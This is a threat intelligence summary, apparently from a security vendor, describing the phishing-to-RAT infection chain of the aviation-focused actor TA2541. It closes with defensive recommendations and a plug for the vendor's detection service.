A threat actor that has been active since at least 2017 has been seen targeting organizations in the aviation, aerospace, transportation, manufacturing, and defense industries, according to newly released research. This threat actor, tracked as TA2541, is believed to operate from Nigeria and uses mostly commodity and open-source malware to compromise its victims.
The primary infection vector used by TA2541 relies on phishing emails containing malicious Microsoft Word documents, however recent campaigns have seen them switch to including links to malicious payloads hosted in cloud services such as Google Drive instead. When executed, these first stage infection payloads drop commodity Remote Access Trojans (or RATs) such as AsyncRAT, NetWire, WSH RAT, and Parallax to establish a backdoor on the system, using a long string of processes to attempt to hide their activity. The initial link or Microsoft Word document utilizes an obfuscated VBS script as its next payload, which leads to executing a PowerShell payload hosted on a site such as Pastetext or Sharetext. This payload then injects into a normal Windows process where further PowerShell is executed to collect information and disable security products. Once this has occurred, the RAT is downloaded and executed, allowing the threat actor to start interacting with the victim system.
The lures used by TA2541 in these campaigns nearly always include transportation related themes and keywords, such as flight, aircraft, fuel, yacht, etc. Unlike other phishing campaigns that may target key individuals in an organization, TA2541 has been seen sending thousands of emails to organizations, opting for a “spray-and-pray” type of attack as opposed to a stealthy operation. While their target does appear to be the transportation sector, it is unknown as of now what their ultimate goal is.
It is recommended to use proper email security controls, such as sandboxing or malware scanning, to help prevent phishing emails containing malware from reaching end users. Proper user training is also important to help end users be able to identify and remove any malicious emails that they receive. This threat actor is known to use off-the-shelf malware and little to no custom code, so maintaining proper endpoint security controls can go a long way in helping prevent a system from being infected. The RATs used by this actor are well-known and any AV scanning engine is likely to have signatures for them. Likewise, having proper endpoint logging and monitoring can help detect the behaviors that these campaigns use. Behaviors like PowerShell calling out to a paste hosting site, WMI querying for security products, and an executable beaconing to a C2 server can all be monitored for and alerted upon to help detect a potential infection. Binary Defense’s Managed Detection and Response service is an excellent asset to assist with these detection needs.